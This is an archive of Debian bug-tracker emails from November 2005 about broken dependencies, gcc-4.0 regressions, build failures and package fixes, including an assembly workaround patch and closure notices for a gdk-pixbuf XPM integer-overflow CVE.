pool/main/g/gtk+2.0/gtk+2.0_2.6.10-2.dsc gtk2-engines-pixbuf_2.6.10-2_i386.deb to pool/main/g/gtk+2.0/gtk2-engines-pixbuf_2.6.10-2_i386.deb gtk2.0-examples_2.6.10-2_i386.deb to pool/main/g/gtk+2.0/gtk2.0-examples_2.6.10-2_i386.deb libgtk2.0-0-dbg_2.6.10-2_i386.deb to pool/main/g/gtk+2.0/libgtk2.0-0-dbg_2.6.10-2_i386.deb libgtk2.0-0_2.6.10-2_i386.deb to pool/main/g/gtk+2.0/libgtk2.0-0_2.6.10-2_i386.deb libgtk2.0-bin_2.6.10-2_i386.deb to pool/main/g/gtk+2.0/libgtk2.0-bin_2.6.10-2_i386.deb libgtk2.0-common_2.6.10-2_all.deb to pool/main/g/gtk+2.0/libgtk2.0-common_2.6.10-2_all.deb libgtk2.0-dev_2.6.10-2_i386.deb to pool/main/g/gtk+2.0/libgtk2.0-dev_2.6.10-2_i386.deb libgtk2.0-doc_2.6.10-2_all.deb to pool/main/g/gtk+2.0/libgtk2.0-doc_2.6.10-2_all.deb A summary of the changes between this version and the previous one
Bug#339492: uninstallable
Package: guile-gnome0-dev Severity: serious Hi Sorry but guile-gnome0-dev is uninstallable. I need it for a package and under sid it failed to install with the following warning: The following packages have unmet dependencies: guile-gnome0-dev: Depends: g-wrap (= 1.9.4) but it is not going to be installed E: Broken packages Greetings Steffen -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-1-686 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#333947: marked as done (Unsatisfiable build-dep xlibmesa-glu-dev)
Your message dated Wed, 16 Nov 2005 09:47:08 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#333947: fixed in gngb 20040115-3 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 14 Oct 2005 15:40:17 + From [EMAIL PROTECTED] Fri Oct 14 08:40:17 2005 Return-path: [EMAIL PROTECTED] Received: from outmx007.isp.belgacom.be [195.238.3.234] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1EQRfN-0005u6-00; Fri, 14 Oct 2005 08:40:17 -0700 Received: from outmx007.isp.belgacom.be (localhost [127.0.0.1]) by outmx007.isp.belgacom.be (8.12.11/8.12.11/Skynet-OUT-2.22) with ESMTP id j9EFeD69017647 for [EMAIL PROTECTED]; Fri, 14 Oct 2005 17:40:13 +0200 (envelope-from [EMAIL PROTECTED]) Received: from [192.168.2.3] (157.187-136-217.adsl.skynet.be [217.136.187.157]) by outmx007.isp.belgacom.be (8.12.11/8.12.11/Skynet-OUT-2.22) with ESMTP id j9EFe9W2017602 for [EMAIL PROTECTED]; Fri, 14 Oct 2005 17:40:09 +0200 (envelope-from [EMAIL PROTECTED]) Message-ID: [EMAIL PROTECTED] Date: Fri, 14 Oct 2005 17:38:35 +0200 From: Luk Claes [EMAIL PROTECTED] User-Agent: Debian Thunderbird 1.0.7 (X11/20051010) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [EMAIL PROTECTED] Subject: Unsatisfiable build-dep xlibmesa-glu-dev X-Enigmail-Version: 0.92.0.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.4 required=4.0 tests=BAYES_00,HAS_PACKAGE, UPPERCASE_25_50 autolearn=no version=2.60-bugs.debian.org_2005_01_02 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Package: gngb Severity: serious Version: 20040115-2 Hi Please change your build dependency on xlibmesa-glu-dev to libglu1-xorg-dev | libglu-dev or something similar. Cheers Luk - -- Luk Claes - http://people.debian.org/~luk - GPG key 1024D/9B7C328D Fingerprint: D5AF 25FB 316B 53BB 08E7 F999 E544 DE07 9B7C 328D -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDT9D75UTeB5t8Mo0RAgoBAJ4wBEbUKMliWfMGzHj4BxZKgxubQACdEUZ+ XbqJPi6olxL3Ixi+BwtyxwM= =yegK -END PGP SIGNATURE- --- Received: (at 333947-close) by bugs.debian.org; 16 Nov 2005 17:56:26 + From [EMAIL PROTECTED] Wed Nov 16 09:56:26 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcRNE-00068U-6L; Wed, 16 Nov 2005 09:47:08 -0800 From: Julien Delange [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#333947: fixed in gngb 20040115-3 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 09:47:08 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 Source: gngb Source-Version: 20040115-3 We believe that the bug you reported is fixed in the latest version of gngb, which is due to be installed in the Debian FTP archive: gngb_20040115-3.diff.gz to pool/main/g/gngb/gngb_20040115-3.diff.gz gngb_20040115-3.dsc to pool/main/g/gngb/gngb_20040115-3.dsc gngb_20040115-3_i386.deb to pool/main/g/gngb/gngb_20040115-3_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Julien Delange [EMAIL PROTECTED] (supplier of updated gngb package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Wed, 16 Nov 2005 17:05:42 +0100 Source: gngb Binary: gngb Architecture: source i386 Version: 20040115-3 Distribution: unstable Urgency: low Maintainer: Julien Delange [EMAIL PROTECTED] Changed-By: Julien Delange [EMAIL PROTECTED] Description: gngb - GameBoy Emulator Closes: 333947 Changes: gngb (20040115-3)
Processed: tagging 339458
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.9.8 tags 339458 pending Bug#339458: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code Tags were: patch security Tags added: pending End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#336114: marked as done (gcc-4.0_4.0.1-9 backwards incompatible changes)
Your message dated Wed, 16 Nov 2005 10:32:19 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#336114: fixed in gcc-4.0 4.0.2-4 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 27 Oct 2005 22:54:35 + From [EMAIL PROTECTED] Thu Oct 27 15:54:35 2005 Return-path: [EMAIL PROTECTED] Received: from tomts22.bellnexxia.net (tomts22-srv.bellnexxia.net) [209.226.175.184] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1EVGdm-00076f-00; Thu, 27 Oct 2005 15:54:34 -0700 Received: from [192.168.0.100] ([70.50.215.163]) by tomts22-srv.bellnexxia.net (InterMail vM.5.01.06.10 201-253-122-130-110-20040306) with ESMTP id [EMAIL PROTECTED] for [EMAIL PROTECTED]; Thu, 27 Oct 2005 18:54:33 -0400 From: Christopher Martin [EMAIL PROTECTED] Reply-To: Christopher Martin [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: gcc-4.0_4.0.1-9 backwards incompatible changes Date: Thu, 27 Oct 2005 18:54:31 -0400 User-Agent: KMail/1.8.2 MIME-Version: 1.0 Content-Type: Multipart/Mixed; boundary=Boundary-00=_qqVYD4BNPtfVWZL Message-Id: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2005_01_02 --Boundary-00=_qqVYD4BNPtfVWZL Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Package: libstdc++6 Version: 4.0.2-3 Severity: grave A kdebase built with gcc/libstdc++6 4.0.1-8 is not compatible with a kdebase built with 4.0.1-9 or later. The result are crashes like #335658, unless (in that case) arts is rebuilt with 4.0.1-9+, in which case the problem disappears. Another example is #336009, a crash that can be resolved by rebuilding kdelibs and arts (but if one is still built with 4.0.1-8, crash...). Comparing old and new builds of konq_sound.so (part of libkonq4, a kdebase package), we get attachment [1]. Comparing libmcop.so.1.0.0 (part of libarts1c2, an arts package), we get attachment [2]. So either upstream will have to revert some changes, or we'll have to just rebuild all packages that seem affected and move on. The following 4 commits look like they might be the culprit: http://gcc.gnu.org/ml/gcc-cvs/2005-09/msg00667.html http://gcc.gnu.org/ml/gcc-cvs/2005-09/msg00668.html http://gcc.gnu.org/ml/gcc-cvs/2005-09/msg00701.html http://gcc.gnu.org/ml/gcc-cvs/2005-09/msg00710.html Cheers, Christopher Martin [1] base.diff [2] arts.diff --Boundary-00=_qqVYD4BNPtfVWZL Content-Type: text/x-diff; charset=us-ascii; name=base.diff Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=base.diff --- old 2005-10-27 18:37:34.0 -0400 +++ new 2005-10-27 18:38:11.0 -0400 @@ -4,7 +4,7 @@ T _fini T _init T init_konq_sound -V guard variable for __gnu_cxx::__common_pool_policy__gnu_cxx::__pool, true::_S_get_pool()::_S_pool +V guard variable for __gnu_cxx::__common_pool__gnu_cxx::__pool, true::_S_get_pool()::_S_pool W QValueListQString::detachInternal() W KonqSoundPlayer::~KonqSoundPlayer() W KonqSoundPlayer::~KonqSoundPlayer() @@ -26,7 +26,7 @@ T KonqSoundPlayerImpl::~KonqSoundPlayerImpl() W __gnu_cxx::__mt_allocArts::TraderOffer, __gnu_cxx::__common_pool_policy__gnu_cxx::__pool, true ::deallocate(Arts::TraderOffer*, unsigned int) W __gnu_cxx::__mt_allocstd::string, __gnu_cxx::__common_pool_policy__gnu_cxx::__pool, true ::deallocate(std::string*, unsigned int) -W __gnu_cxx::__common_pool_policy__gnu_cxx::__pool, true::_S_get_pool() +W __gnu_cxx::__common_pool__gnu_cxx::__pool, true::_S_get_pool() W KLibFactory::metaObject() const W QGList::count() const W QObject::metaObject() const @@ -42,4 +42,4 @@ V vtable for KonqSoundFactory V vtable for KonqSoundPlayerImpl V vtable for QGList -V __gnu_cxx::__common_pool_policy__gnu_cxx::__pool, true::_S_get_pool()::_S_pool +V __gnu_cxx::__common_pool__gnu_cxx::__pool, true::_S_get_pool()::_S_pool --Boundary-00=_qqVYD4BNPtfVWZL Content-Type: text/x-diff; charset=us-ascii; name=arts.diff Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=arts.diff --- old +++ new @@ -42,7 +42,7 @@ T lt_dlsetsearchpath T lt_dlsym T arts_strdup_printf(char const*, ...) -V guard variable for
Bug#336463: marked as done (Floating point exception ICE on mips and mipsel)
Your message dated Wed, 16 Nov 2005 10:32:19 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#336463: fixed in gcc-4.0 4.0.2-4 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 30 Oct 2005 13:31:29 + From [EMAIL PROTECTED] Sun Oct 30 05:31:29 2005 Return-path: [EMAIL PROTECTED] Received: from head.linpro.no [80.232.36.1] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1EWDHV-0001LF-00; Sun, 30 Oct 2005 05:31:29 -0800 Received: from pride.fud.no ([213.145.167.26]) by head.linpro.no with asmtp (Exim 4.14 #1 (Debian)) id 1EWDHT-qU-DM; Sun, 30 Oct 2005 14:31:27 +0100 Subject: Floating point exception ICE on mips and mipsel From: Tore Anderson [EMAIL PROTECTED] To: [EMAIL PROTECTED] Content-Type: text/plain Date: Sun, 30 Oct 2005 14:31:27 +0100 Message-Id: [EMAIL PROTECTED] Mime-Version: 1.0 X-Mailer: Evolution 2.2.3 Content-Transfer-Encoding: 7bit X-Spam-Score: 0.0 (/) X-Scanner: exiscan for exim4 (http://duncanthrax.net/exiscan/) *1EWDHT-qU-DM*lCgCAYjMDGw* Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: g++-4.0 Severity: critical Version: 4.0.2-3 Hi. I just uploaded ScummVM 0.8.0, which fails to build from source due to an ICE: scumm/thumbnail.cpp: In member function 'Graphics::Surface* Scumm::ScummEngine::loadThumbnail(Common::InSaveFile*)': scumm/thumbnail.cpp:100: internal compiler error: Floating point exception You can find the buildd logs here: http://buildd.debian.org/fetch.php?pkg=scummvmver=0.8.0-1arch=mipsstamp=1130622019file=logas=raw http://buildd.debian.org/fetch.php?pkg=scummvmver=0.8.0-1arch=mipselstamp=1130622745file=logas=raw I'm afraid this is all the debug information I can supply, as I don't own any mips[el] machines. The sources that makes it fail should be available in the archive shortly, though. Kind regards -- Tore Anderson --- Received: (at 336463-close) by bugs.debian.org; 16 Nov 2005 18:41:33 + From [EMAIL PROTECTED] Wed Nov 16 10:41:33 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcS4x-0006zr-0t; Wed, 16 Nov 2005 10:32:19 -0800 From: Matthias Klose [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#336463: fixed in gcc-4.0 4.0.2-4 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 10:32:19 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 X-CrossAssassin-Score: 6 Source: gcc-4.0 Source-Version: 4.0.2-4 We believe that the bug you reported is fixed in the latest version of gcc-4.0, which is due to be installed in the Debian FTP archive: cpp-4.0-doc_4.0.2-4_all.deb to pool/main/g/gcc-4.0/cpp-4.0-doc_4.0.2-4_all.deb cpp-4.0_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/cpp-4.0_4.0.2-4_i386.deb fastjar_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/fastjar_4.0.2-4_i386.deb fixincludes_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/fixincludes_4.0.2-4_i386.deb g++-4.0_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/g++-4.0_4.0.2-4_i386.deb gcc-4.0-base_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/gcc-4.0-base_4.0.2-4_i386.deb gcc-4.0-doc_4.0.2-4_all.deb to pool/main/g/gcc-4.0/gcc-4.0-doc_4.0.2-4_all.deb gcc-4.0-locales_4.0.2-4_all.deb to pool/main/g/gcc-4.0/gcc-4.0-locales_4.0.2-4_all.deb gcc-4.0_4.0.2-4.diff.gz to pool/main/g/gcc-4.0/gcc-4.0_4.0.2-4.diff.gz gcc-4.0_4.0.2-4.dsc to pool/main/g/gcc-4.0/gcc-4.0_4.0.2-4.dsc gcc-4.0_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/gcc-4.0_4.0.2-4_i386.deb gcj-4.0_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/gcj-4.0_4.0.2-4_i386.deb gfortran-4.0-doc_4.0.2-4_all.deb to pool/main/g/gcc-4.0/gfortran-4.0-doc_4.0.2-4_all.deb gfortran-4.0_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/gfortran-4.0_4.0.2-4_i386.deb gij-4.0_4.0.2-4_i386.deb to pool/main/g/gcc-4.0/gij-4.0_4.0.2-4_i386.deb gnat-4.0-doc_4.0.2-4_all.deb to pool/main/g/gcc-4.0/gnat-4.0-doc_4.0.2-4_all.deb
Bug#336167: marked as done (gcc-4.0: breaks kernel builds in random ways.)
Your message dated Wed, 16 Nov 2005 10:32:19 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#336463: fixed in gcc-4.0 4.0.2-4 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 28 Oct 2005 09:33:45 + From [EMAIL PROTECTED] Fri Oct 28 02:33:45 2005 Return-path: [EMAIL PROTECTED] Received: from smtp4.wanadoo.fr [193.252.22.27] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1EVQcL-0005gk-00; Fri, 28 Oct 2005 02:33:45 -0700 Received: from me-wanadoo.net (localhost [127.0.0.1]) by mwinf0408.wanadoo.fr (SMTP Server) with ESMTP id BFEE51C0011C for [EMAIL PROTECTED]; Fri, 28 Oct 2005 11:33:13 +0200 (CEST) Received: from pegasos (AStrasbourg-251-1-40-23.w82-126.abo.wanadoo.fr [82.126.157.23]) by mwinf0408.wanadoo.fr (SMTP Server) with ESMTP id 888971C00113 for [EMAIL PROTECTED]; Fri, 28 Oct 2005 11:33:13 +0200 (CEST) X-ME-UUID: [EMAIL PROTECTED] Received: from sven by pegasos with local (Exim 4.50) id 1EVQac-0005rz-NR for [EMAIL PROTECTED]; Fri, 28 Oct 2005 11:31:58 +0200 Date: Fri, 28 Oct 2005 11:31:53 +0200 To: [EMAIL PROTECTED] Subject: gcc-4.0: breaks kernel builds in random ways. Message-ID: [EMAIL PROTECTED] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.9i From: Sven Luther [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: gcc-4.0 Version: 4.0.2-3 Severity: grave Justification: renders package unusable Well, i confirm that this problem is also present on powerpc, using gcc-4.0 4.0.2-3 makes the kernel build fail, while using -2 seems to be ok. I have heard people mentioning two other arches where this is the case (m68k and mips i think) on irc (on #debian-release i think even, not sure), but no bug has been filed so i do it now. My powerpc builds failed with : 08:22 svenl kernel/spinlock.c:72:61: error: macro _spin_lock_irqsave requires 2 arguments, but only 1 given 08:22 svenl kernel/spinlock.c:99:59: error: macro _read_lock_irqsave requires 2 arguments, but only 1 given 08:22 svenl kernel/spinlock.c:126:60: error: macro _write_lock_irqsave requires 2 arguments, but only 1 given 08:22 svenl /bin/sh: line 1: 7269 Done(1) gcc -m32 -E -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -ffreestanding -O2 -fomit-frame-pointer -Iarch/ppc -msoft-float -pipe -ffixed-r2 -mmultiple -mstring -Wa,-maltivec -Wdeclaration-after-statement -Wno-pointer-sign -D__GENKSYMS__ -Wp,-MD,kernel/.spinlock.o.d -nostdinc -isystem /usr/lib/gcc/powerpc-linux-gnu/4.0.3/include -D__KERNEL__ -Iinclude -Iarch/ppc -Iarch/ppc/include -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -ffreestanding -O2 -fomit-frame-pointer -Iarch/ppc -msoft-float -pipe -ffixed-r2 -mmultiple -mstring -Wa,-maltivec -Wdeclaration-after-statement -Wno-pointer-sign -DKBUILD_BASENAME=spinlock -DKBUILD_MODNAME=spinlock kernel/spinlock.c And then later : 08:42 svenl fs/ext2/acl.c:483: error: called object '0u' is not a function 08:42 svenl {standard input}: Assembler messages: 08:42 svenl {standard input}:39: Error: symbol `error' is already defined 08:42 svenl {standard input}:57: Error: symbol `retval' is already defined 08:42 svenl {standard input}:72: Error: symbol `name_index' is already defined 08:42 svenl {standard input}:77: Error: symbol `value' is already defined While a 4.0.2-2 build passed fine. Friendly, Sven Luther -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: powerpc (ppc) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-rc5-powerpc Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages gcc-4.0 depends on: ii binutils 2.16.1cvs20050902-1 The GNU assembler, linker and bina ii cpp-4.0 4.0.2-3 The GNU C preprocessor ii gcc-4.0-base 4.0.2-3 The GNU Compiler Collection (base ii libc62.3.5-7 GNU C Library: Shared libraries an ii libgcc1
Bug#337391: libcgi-ssi-perl: FTBFS: Missing Build-Depends on netbase
Hello people, Also, you need to make sure the package builds on a machine which is offline, since requiring network access during a package build is a serious problem -- although I haven't yet been able to check whether that's the case here. I can confirm that the package doesn't build correctly when the host is offline, see below. regards, Thijs make test make[1]: Entering directory `/tmp/debian/libcgi-ssi-perl-0.88' PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/lib -Iblib/arch test.pl 1..26 ok 1 - use CGI::SSI; ok 2 - set/echo 1 ok 3 - set/echo 2 ok 4 - data encapsulation ok 5 - new() ok 6 - config 1 ok 7 - config 2 ok 8 - config 3 CGI::SSI error: failed to get('http://www.yahoo.com/'): 500 Can't connect to www.yahoo.com:80 (Bad hostname 'www.yahoo.com'). not ok 9 - include virtual 1 # Failed test (test.pl at line 107) ok 10 - include virtual 2 CGI::SSI error: failed to get('http://www.yahoo.com/'). not ok 11 - exec cgi # Failed test (test.pl at line 125) ok 12 - exec cmd ok 13 - if/else ok 14 - if/elif ok 15 - if/elif/else ok 16 - if 1 ok 17 - if 2 ok 18 - if 3 ok 19 - if/elif/else ok 20 - inherit 1 ok 21 - inherit 2 ok 22 - config{timefmt} ok 23 - recursion check CGI::SSI error: failed to get('http://www.bitperfect.com/cgi-bin/cgi-ssi/cookietest.cgi'): 500 Can't connect to www.bitperfect.com:80 (Bad hostname 'www.bitperfect.com'). not ok 24 - cookie support # Failed test (test.pl at line 276) ok 25 - tied object isa CGI::SSI ok 26 - close() # Looks like you failed 3 tests of 26. make[1]: *** [test_dynamic] Error 3 make[1]: Leaving directory `/tmp/debian/libcgi-ssi-perl-0.88' make: *** [debian/build-stamp] Error 2 debuild: fatal error at line 765: dpkg-buildpackage failed! signature.asc Description: This is a digitally signed message part
Bug#339509: FTBFS on hppa using expect
Package: binutils Version: 2.16.1cvs20051109-1 Severity: serious Tags: patch Using expect-tcl8.3 lets the build succeed. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#335881: Patch
The first few instruction bundles are not 12 bytes long, as required, but 11 bytes, with catastrophic consequences. I will see what can be done about this. Technically, this is not a GAS bug. Below is a first attempt at a patch. It doesn't pass the test suite (but debian/rules doesn't detect the failure), and some bugs around indirect jumps still remain. I'm now wondering if it really makes sense to keep yet another bignum library in Debian. We already have GMP, libgcrypt and OpenSSL... --- add.S 2005/11/16 16:24:16 1.1 +++ add.S 2005/11/16 19:05:50 @@ -993,7 +993,16 @@ # boucle d addition déroulée pour 16 chiffres ALIGN(4) L(begin): -BODY(-4,0,4); BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) + # BODY(-4,0,4) est augmenté manuellement parce que GAS choisit + # une instruction de tres octets pour mov 0(%esi,%ecx,4),%edx + # et des instructions similaires. + adcl -4(%ebx,%ecx,4), %eax + .byte 0x8b, 0x54, 0x8e, 0x00 # movl 0(%esi,%ecx,4), %edx + movl %eax, -4(%edi,%ecx,4) + .byte 0x13, 0x54, 0x8b, 0x00 # adcl 0(%ebx,%ecx,4), %edx + movl 4(%esi,%ecx,4), %eax + .byte 0x89, 0x54, 0x8f, 0x00 # movl %edx, 0(%edi,%ecx,4) +BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) BODY(28,32,36); BODY(36,40,44); BODY(44,48,52); BODY(52,56,60) leal 15(%ecx), %ecx @@ -1205,7 +1214,18 @@ # boucle de soustraction déroulée pour 16 chiffres ALIGN(4) L(begin): -BODY(-4,0,4); BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) + movl %eax, -4(%edi,%ecx,4) + movl 4(%esi,%ecx,4), %eax + # BODY(-4,0,4) est augmenté manuellement parce que GAS choisit + # une instruction de tres octets pour mov 0(%esi,%ecx,4),%edx + # et des instructions similaires. + sbbl -4(%ebx,%ecx,4), %eax + .byte 0x8b, 0x54, 0x8e, 0x00 # movl 0(%esi,%ecx,4), %edx + movl %eax, -4(%edi,%ecx,4) + .byte 0x1b, 0x54, 0x8b, 0x00 # sbbl 0(%ebx,%ecx,4), %edx + movl 4(%esi,%ecx,4), %eax + .byte 0x89, 0x54, 0x8f, 0x00 # movl %edx, 0(%edi,%ecx,4) +BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) BODY(28,32,36); BODY(36,40,44); BODY(44,48,52); BODY(52,56,60) leal 15(%ecx), %ecx @@ -1350,7 +1370,16 @@ # boucle d addition déroulée pour 16 chiffres ALIGN(4) L(begin): -BODY(-4,0,4); BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) + # BODY(-4,0,4) est augmenté manuellement parce que GAS choisit + # une instruction de tres octets pour mov 0(%esi,%ecx,4),%edx + # et des instructions similaires. + adcl -4(%esi,%ecx,4), %eax + .byte 0x8b, 0x54, 0x8b, 0x00 # movl 0(%ebx,%ecx,4), %edx + movl %eax, -4(%esi,%ecx,4) + .byte 0x13, 0x54, 0x8e, 0x00 # adcl 0(%esi,%ecx,4), %edx + movl 4(%ebx,%ecx,4), %eax + .byte 0x89, 0x54, 0x8e, 0x00 # movl %edx, 0(%esi,%ecx,4) +BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) BODY(28,32,36); BODY(36,40,44); BODY(44,48,52); BODY(52,56,60) leal 15(%ecx), %ecx @@ -1485,7 +1514,16 @@ # boucle de soustraction déroulée pour 16 chiffres ALIGN(4) L(begin): -BODY(-4,0,4); BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) + # BODY(-4,0,4) est augmenté manuellement parce que GAS choisit + # une instruction de tres octets pour mov 0(%esi,%ecx,4),%edx + # et des instructions similaires. + sbbl -4(%ebx,%ecx,4), %eax + .byte 0x8b, 0x54, 0x8e, 0x00 # movl 0(%esi,%ecx,4), %edx + movl %eax, -4(%esi,%ecx,4) + .byte 0x1b, 0x54, 0x8b, 0x00 # sbbl 0(%ebx,%ecx,4), %edx + movl 4(%esi,%ecx,4), %eax + .byte 0x89, 0x54, 0x8e, 0x00 # movl %edx, 0(%esi,%ecx,4) +BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) BODY(28,32,36); BODY(36,40,44); BODY(44,48,52); BODY(52,56,60) leal 15(%ecx), %ecx
Bug#339458: marked as done (CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code)
Your message dated Wed, 16 Nov 2005 11:32:07 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#339458: fixed in gdk-pixbuf 0.22.0-11 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 16 Nov 2005 09:17:36 + From [EMAIL PROTECTED] Wed Nov 16 01:17:36 2005 Return-path: [EMAIL PROTECTED] Received: from inutil.org ([193.22.164.111] helo=vserver151.vserver151.serverflex.de) by spohr.debian.org with esmtp (Exim 4.50) id 1EcJQ7-0006Do-Pd for [EMAIL PROTECTED]; Wed, 16 Nov 2005 01:17:35 -0800 Received: from wlan-client-004.informatik.uni-bremen.de ([134.102.116.5] helo=localhost.localdomain) by vserver151.vserver151.serverflex.de with esmtpsa 